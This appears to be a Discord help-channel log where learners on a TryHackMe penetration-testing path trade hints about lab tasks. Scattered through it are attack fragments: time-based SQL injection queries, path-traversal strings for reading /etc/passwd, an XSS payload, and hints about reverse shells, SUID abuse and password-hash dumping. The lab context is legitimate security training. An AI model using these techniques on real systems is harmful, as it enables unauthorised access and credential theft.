I've still got a question from this that I don't understand. How would you be able to identify the system requires a POST vs GET command in order to exploit the file inclusion?
Is it really just trial and error or are there certain things you would look out for?

any hints for challenge3 in file inclusion?

Capture Flag3 at /etc/flag3?

yes

look above ^

ye its adding .php in the end and we have to use the null byte to bypass it but wwhat about the filter because it is removing all special characters and numbers 🤔

There is a way around the filter. There is also more that 1 type of HTTP request

Did you figure it out?

on the SQLi Task 8 - time based, I keep getting errors after finding the table name by trying to find column_name

I know _ can be a wildcard character, but it's also a valid character in table names

is that messing me up somehow?

I also have the table name

idk how to spoiler it

thanks

I have the table_name as ||users||

|| select * from analytics_referrers where domain='admin123' UNION SELECT SLEEP(1),2 from information_schema.tables where table_schema = 'sqli_four' and table_name = 'users' and like '%'; --' LIMIT 1 ||

this works

|| select * from analytics_referrers where domain='admin123' UNION SELECT SLEEP(1),2 from information_schema.tables where table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--' LIMIT 1 || this is throwing an error

unkown column 'column_name''

head, meet desk

this is why, after multiple semesters of database stuff, I gave up on ever wanting to work as a dba or dbe

that's a carry-in from the server-side

I posted the sql quesry box

nah, you're good.

some old guy in the 60's didn't like file hierarchies and here I am, learning SQLi

im on ssrf task 2 trying to get the flag and the url i currently have is https://website.thm/item/2?server=api.website.thm/flag&x=&id=9 im getting a 504 so i know im close i tried changing a few things and i get a 404 or still a 504

Hey guys, I am on the linux privesc task where I gain root shell access on a reverse shell through a cronjob. However, once the script executes and I get a connection on the reverse shell(attacking machine), it connects as the unprivileged user(karen) instead of root. can you help me out as to why this happens

i believe that is what is supposed to happen and you have to continue to escalate

im not there nor do i know the answer i just have seen it talked about in this chat

oh. I still doubt tho. Il just wait for someone to answer. thanks!

ill see if i can find it, i think someone asked the same question

Yeah I too found in the chat where @steel nymph shared his insights there.

here

I think running the script manually is not expected. Probably let it run for a while and see if things turn out to be good

ahhh yess. it worked

i almost specifically remember some one saying something about user karen not having privilege's in privesc and the response was "thats supposed to happen"

yeah. I changed the privileges. The task expects us to let the cronjob do its task on its own and not do it manually

but thanks! @wet gulch

Gave +1 Rep to @wet gulch

#room-help message

here

#room-help message

and this

@subtle forge it was in a different chat sory

i found it though

yep yep. seems like a lot of em struggled here

i probably will too 🙂

I am having issues on the Msfvenom (Task6) of Metasploit Exploitation

Youre always helpful someway or the other mate! thanks @steel nymph

Gave +1 Rep to @steel nymph

the botom?

bottom?

I have a meterpreter session, but ||use post/linux/gather/hashdump|| is failing

I am getting ||Failed to load extension: i486-linux-musl/post/linux/gather/hashdump not found|| as an error

i didnt scroll down lol i see know, let me try again

thank you

lol

nevermind lol

I was trying use instead of run...

okay im dumb, i see the format is different, can i get another hint? @steel nymph

right so on linux priv esc rask 7 the task says we should use nano as it has ||the s bit set|| tho on my vm it doesnt... literally cant do the steps as they are laid out without nano or am i looking at this wrong

ah okay

off to gtfo bin i go then

I still have 60 percent to go. Almost done with web hacking as a complete noobie

Hey guys

In the Protocols and severs 2

For TLS

Task 4

Where they ask what is the 3 letter acronym of the DNS protocol that uses TLS

I can't find the answer anywhere

Did you check the hint? It says you have to look it up.

Found it

Thanks

How do you send hidden spoiler from phone?

Ok

So

Im writing

||scp book.txt mark@10.10.10.203:/home/mark||

Not working tho

It says book not found

That's what they have in the example above

Weirs

D

Ah wait

Yeah my bad

Im reading too quickly lol

Got it

Hey guys, I'm working on the Linux PrivEsc specifically the section on crontab. I have both files set to run the reverse shell but nothing is connecting back to my netcat listener. Is there something im missing?

I'm sorry, I'm not exactly sure what you mean by that

Do you have to manually run the crontabs?

• • • • • means that the crontab should run every minute right?

I tried running crontab antivirus.sh and received an error stating "antivirus.sh":2: bad minute

Am I on the right track?

The crontab service may not be running. I tried ps and I didnt see the process there

Should I just do this task on the attack box instead?

So, you can run the script separate from the cronjob running it?

Permission denied

should I chmod first?

Did you find the file where you have write permissions?

Ok, I got it working but no root privileges. I'm gonna take a look further. Thanks so much for the help 🙂

Ah, that makes a lot of sense

Thanks again

Ok

Only Linux privesc and windows privesc remaining and i get the certficate

Im gonna do them tomorrow im super tired

Are they difficult?

I'm working on the Linux PrivEsc right now. Some of the questions can be a bit tricky. At least for me.

You got this bro

I would just take it one question at a time

I appreciate it @noble rose 🙂

I am on the LinPrivEsc Task 5 and when I ssh into the box karen has no home directory, is it supposed to be like that?

I cant find anywhere to write a file as Karen to exploit

Thanks @steel nymph , I found it from the first clue

I've made sure my names don't have any spaces several times and still it doesn't work.. tried to clean everything and just leave the names, doesn't work; tried just removing extra lines between the names, doesn't work; tried doing everything all over again, doesn't work..... what a freaking mess xD

So it kind of goes without saying, but I think worth mentioning. In the SQLi course it doesn't say how we can verify that we have reached the full name of a database, table, column, or column entries. To verify that you have fully enumerated a name you can remove the wildcard. If the results still come back true then we know the full name. Something I added to my own notes. Thought it may help someone else as well!

Thank you @quiet crow

Gave +1 Rep to @quiet crow

🙂

Btw, I solved my issue. I was creating my valid_usernames.txt with a ">" from the previous question and removing spaces and stuff but the formatting still got messy. So I just created a new file, typed the names, ran the brute force commad again and it solved the issue 😃 (thanks for the help anyway @unique steppe )

pretty much @steel nymph, don't really know what went through my head to assume my old ways were just fine 😅

I got stuck on #5 for command injection and just got it. Sometimes overthinking is the problem...

If anyone gets stuck at that one, look at the payload samples and keep it simple. Really simple lol

Dear THM staff. ❤️

Can we undo our progress to earn more tickets?

nope

im revising everything after completing.

they dont give tickets again obviously

😦

I needed 1 more for a pineapple, just completed the path

darn

sad we can't keep our pentester title forever

In windows priv esc how to connect to windows instance?

I'm having the exact same issue - not seeing the credential. Did you get any feedback on this.
can anyone help?

!docs verify

Anyone completed protocols and server room 2??

What do you need help with?

Task 5 second question

In tried scp mark@ip:/home/mark/book.txt

I couldn’t copy the file

Send a link to the room

Wdym

Send the link for the room you need help with

I'm too lazy to go out and find it myself

K

https://tryhackme.com/room/protocolsandservers2

yes, I've verified my profile.

Authentication Bypass, Task 3 - not seeing credential. getting this.

I got the solution

port is the default one or something else? I do not remember exactly

I can give you the exact answer but it's better to give some hints

Yeah. It was due to my formatting of the source file from the previous task. Sorted that and it worked fine

I'm trying to understand why in SQLi (Web hacking) this is acceptable as an sql statements "admin123' UNION SELECT 1,2,3;-- ". Specifically i don't get after the UNION statement.....I mean the SELECT doesn't specify a table or something. How is this acceptable?

Hey guys in linux privesc kernel exploitation, i got the CVE code, i started a SimpleHTTPserver using python, but i can't use wget on karen

Like it says permission denied cannot write to 'exploit.c'

When i try to download the exploit to the system

What should i do

Hello hello, hope you all are fantastic.

I am thinking of doing a game of Jeopardy with a few friends on the Junior Pentesting path.

Does anyone have a few questions that you think would fit nicely?

For the themes I'll do the ones in the path; like intro to web hacking, Burp, Net sec...

++

You are trying to write a file in root directory, firstly go to user karen home folder and then use wget there.

No worries i solved it, i just went to /tmp and downloaded it there thanks @winter perch

Gave +1 Rep to @winter perch

Have you tried the Windows one?

Not yet no

Can anyone give me a nudge how can I access Windows target instance, steps are not mentioned in room.

🤣 😆 🙃

Not sure which one you're talking about, but are there any RDP user credentials mentioned in any of the room tasks?

I am talking about the Win Priv esc nothing is mentioned there, I tried to find.

Sure you typing the command out properly

Look closer at Task 5 DLL Hijacking

Okay thanks these are not mentioned in the Task2. Let me try

Gave +1 Rep to @gleaming loom

Guys I have a doubt,
I got 2 (1month premium vouchers ),
it means I can get 2months premium??

@solid forge You win only, if you get three of the same kind

If anyone have doubt in lab8 of SQL injection he ) She can ask me

It means I need one more premium voucher to win 1 month premium

need help with Task 8 of File inclusion

what to do? need help.

why this "admin123' UNION SELECT 1,2,3;--" is valid?

you have to think n how the program on the server receives and processes this data

probably it has something like : SELECT * FROM TABLE WHERE USER = [your data entried here]

so, it finally gets populated as: SELECT * FROM TABLE WHERE USER = admin123' UNION SELECT 1,2,3;

more or less, is not exact, but just to have an idea

yes but I don't get how Union Select 1,2,3; is valid....Am I missing SQL syntax knowledge here?
When i write that im my cmd , it says that after SELECT I'm missing table name...

https://portswigger.net/web-security/sql-injection/union-attacks <-- If you can invest some time...

I'm losing my mind with WinPrivEsc, it's dropping connection every few minutes

That statement is just trying to find that amount of columns in the table. In this case it's 3

Can someone please help me with File Inclusion room Task 8.

I am trying to send the request as POST method and its not showing any changes

I am sure I am missing something here?

HEY, I FINALLY GOT THIS ONE. THANK YOU SO MUCH 🥺

Gave +1 Rep to @steel nymph

Can someone help me with task 5 command injection I don't get it

Hey guys I can't get the directory to download I have to use the command:
scp pentester@10.10.199.15:/home/pentester/*

but I get nothing back
pentester has the password THM17577

I tried with WGET, it does not work.
Then I tried with: sshpass -p "password" but I don't get anywhere

but I can't get any further, can anyone give me a hint what I'm doing wrong?

This has been going on for 2 days now that I can't complete the "Authentication Bypass" task 4 for Logic Flow. Nothing wrong with my network.

Can this be done on my own VM w/ VPN?

Was just following instructions as it was saying to do both the Curls and attackbox. OI assumed it was setup in a way to make it work the way it was decided to.

Thanks

File Inclusion, TASK 8 - flag 2 :

Been trying since 1 hour with Burp but cannot get the flag. Just tried the same thing within the web dev tools (firefox) and it worked within 3 seconds.. what the hell ?

have you tried changing the cookies?

oh

You've already done it. my bad

Yes, changed it to the right value and still getting error with burp, except with the first value we need to change (#guest)

but firefox tool worked the first time

dont understand

FINALLY!!!! Gracias!!!!

Except that I needed to have fuff and gobuster installed properly to understand the outcome.

or ffuf***

let me check that.

DANG... I think I'm loosing it. LOL

Indeed it's installed and should have done the number one rule: Check check check!!!!

Um guys

How did you connect to the windows privesc machine? Did you just use the attackbox?

How can i do it from my linux machine?

Ok but which tool did you use

Remmina it is

Thanks man

I am on LinPrivEscSUID and I cannot find any program that has a SUID escape on GTFOBins

can I dm someone about task 8 on sql injection?

I think I'm almost there

File inclusion Task 8 Ahhhh, i need help.

just not sure on what to do with POST, im going for flag1. Using burp. Change get to POST in repeater?

When does this event end is it tonight at midnight or tomorrow at midnight ? I was late to the party but getting there 😄

I too have the same question

So i changed the request to POST ../../../../etc/flag1. nothing,

hi need a nudge regarding the linux privesc capstone challenge

all good.

Just got the certificate!

What a hell of a week

My god i learned alot

Well even if it ends, the rooms will still be there

Is the cert still available after the week ?

Yeah man

Sweet

So don't worry

ok i have now stopped sweating

Hahaha

The only thing that changes is the tickets stop

😅 sweet I am one ticket from wifi pinapple tho 🤔

Better keep hacking then 😉

I have never considered paying for sofware in my life but using burp suite all morning has me thinking about it

It's so fun to use

Ok I am stuck again on LinPrivEscSUID

who would believe I got 3euro voucher on my last machine lol

not only pen title and 1 day streak

So the third question is to get the flag, and from the information I assume that they want me to add a user to passwd. I am just stuck on how I accomplish that. Any hints?

I got how SUID can read files, but I dont know how I am supposed to write to passwd

can someone help me? i have a syntax error and since the event expires tomorrow i would appreciate the answer i am missing 1 ticket for a certificate X:X its the room Nmap Post Port Scans task 5, 2

oh, I overthought that one

sec i restart the machine

THIS IS THE TASK:
Shut down the target machine for the previous task and start the target machine for this task. On the AttackBox terminal, enter the command; scp
pentester@MACHINE_IP:/home/pentester/* . to download the Nmap reports in normal and grepable format from the target virtual machine.

Note that the username pentester has the password THM17577

have also already tried different designs

is the . important?

have already tried it with it

ah wait

ah i have the files already only they were not found on my system earlier luul

xD

here was my request POST /challeneges/index.php?page-../../../../etc/flag1

Hi everyone, So I am stuck on linux privesc task 11 (NFS)
I see there are 3 mountable shares on the target machine, out of which I cant "cd" into 2 of them. so the only genuine one is /tmp

So I mount the /tmp drive on the attacking machine, create the binary and make it execudable, give it SUID permissions and root ownership. however, these files dont show up on the target machines mountable share /tmp. Any idea why??

ne have done it wrong

i become the answer usage: scp and the commands

this what i get

Agreed, the syntax for the first one looks correct if the host is up.

ah okay i restart the vpn and the machine and try again^^

Make sure you update the IP address in your shell after doing that

ahh no i have discord at windows machine is linux xD

ok :=)

In the Linux PrivEsc Capabilities task, the payload for vim is not giving me root access.

yes but then the resolution was bad until now

ping works

I swear I tried that... but now after you say something it works. Thanks @steel nymph

Gave +1 Rep to @steel nymph

I am on Lab#6 of the File Inclusion 6. It is asking me "what is the directory that has to be in the input field?". I have successfully preview the passwd file by including the following url: ....//....//....//....//etc/passwd The format of the answer is expecting less number of alphanumerics (11). I have tried different combinations such as /etc/passwd but I am not able to indicate the directory which seems to be larger. I have also tried: /var/www/html Can anyone help? Thanks.

Is there anything else that has to there to work?

Hi Allez. What do you mean? I include ....//....//....//....//etc/passwd and then press the "Include" button to display the passwd

I can't remember what the answer is, so just going by the way you asked the question, I assume there needs to be something (the directory) that is the starting point? I'll go and have a look at the exact question.

|| I didnt know where to find the remote file for getting me a shell. So, I just used LFI to find the hostname at /etc/hostname. ||

It's a simple spell but quite unbreakable

has anyone been having issues with the XSS part where you have to run the <script>alert('THM');</script> inside the html and it doesn't accept it ?

hi, is there possibility to win some prizes like 1 month premium and above? Because I have 2x for about 5 prizes but I can't win better prizes 😄

level 2 of task 7 i managed to do the level 1 by just adding the script payload on the url

I've found it. Take a good look at the page with the input form

Found it, Thanks. I thought it was a url not a directory.

Gave +1 Rep to @languid shuttle

I've definitely been bitten by assumptions like that far too often!

Oh, noice. Using php_reverse_shell.php as the exploit file?

yeah works for this chall specifically. Nice thought

@steel nymph i mean when i press enter on the inspector it will reload the page and code gone

yes

i guess that is the big error

what should i use ?

ah on the frist one

got it

thanks. i knew i was doing something wrong and guess that was using the inspector

Hey people, I'm trying to complete LFI #2 on inside File Inclusion in the Junior Penetration Tester Course and I accomplished the task, the one thing I can't seem to find is the name of the function in the second question, please help, it is something with 17 characters

-unmute @trail topaz As a heads up: 95,000 users do not want to know about your question, so pinging @ everyone is pretty inconsiderate. As you've already found out, it also insta-mutes you as a bot protection measure. If you have a question, please wait patiently for someone to answer (as indeed just happened) 🙂

🔊 Unmuted StarChild#8442

Thank you!

Gave +1 Rep to @steel nymph

Hi guys, I have a question about apache

WHich room should I ask in?

general

I'm seeing a apache2 default page.

so not sure what to do next ..

not a tryhackme challenge, hence, asking if there's an appropriate room to ask

a port 8080 that leads to a tomcat page :/ also, how do you tell if an ssh port is vulnerable to username enumeration?

#infosec-general

ah sweet! Thanks!